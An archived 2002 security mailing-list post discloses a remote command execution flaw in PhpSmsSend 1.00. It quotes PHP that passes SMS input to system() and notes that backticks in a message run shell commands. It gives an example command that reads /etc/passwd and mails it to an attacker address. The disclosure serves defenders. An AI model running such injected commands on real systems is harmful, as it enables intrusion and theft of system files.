PhpSmsSend remote execute commands bug

From: Indra Kusuma (indraat_private)
Date: Tue Jan 29 2002 - 10:57:51 PST

Next message: - phinegeek -: "Re: CSS, CSS & let me give you some more CSS"

Previous message: tmorgan-securityat_private: "Re: CSS, CSS & let me give you some more CSS"
Next in thread: Indra Kusuma: "PhpSmsSend remote execute commands bug"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

---[ PhpSmsSend remote execute commands bug
  
---[ About PhpSmsSend
        
   PhpSmsSend is a frontend to the SmsSend application. It consists of a
.php file, from which you select one of the available scripts, and then
you can send an SMS wherever you want, all around the world.

PhpSmssend's website is http://zekiller.skytech.org/smssend.php

---[ Affected System

  PhpSmsSystem Version 1.00

---[ Description

from file .php :

      $str = SMSSEND." ".SCRIPTSPATH.$script." $params -- -d 0 ".PROXY;
      system($str,$res);

if the sms messages contain a backtick "`" then inside of backtick will be 
execute as a system command.

the result of the command will send via sms :), so the command output
should be less than 160 characters to send via sms, but if the command
using pipe (ex : cat /etc/passwd|mail evilat_private) or redirection then 
the messages status is successfully :)

---[ Greetz

my Guru GaniSalman, my friend OpsCrew, #indoSniffing and 
#medanHacking (DalNet), Fate Research Labs (www.fatelabs.com), LUG STIKOM 
(lug.stikom.edu), and the gauli.com owner


---

cheers,


IndraKusuma

Next message: - phinegeek -: "Re: CSS, CSS & let me give you some more CSS"
Previous message: tmorgan-securityat_private: "Re: CSS, CSS & let me give you some more CSS"
Next in thread: Indra Kusuma: "PhpSmsSend remote execute commands bug"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jan 29 2002 - 13:07:39 PST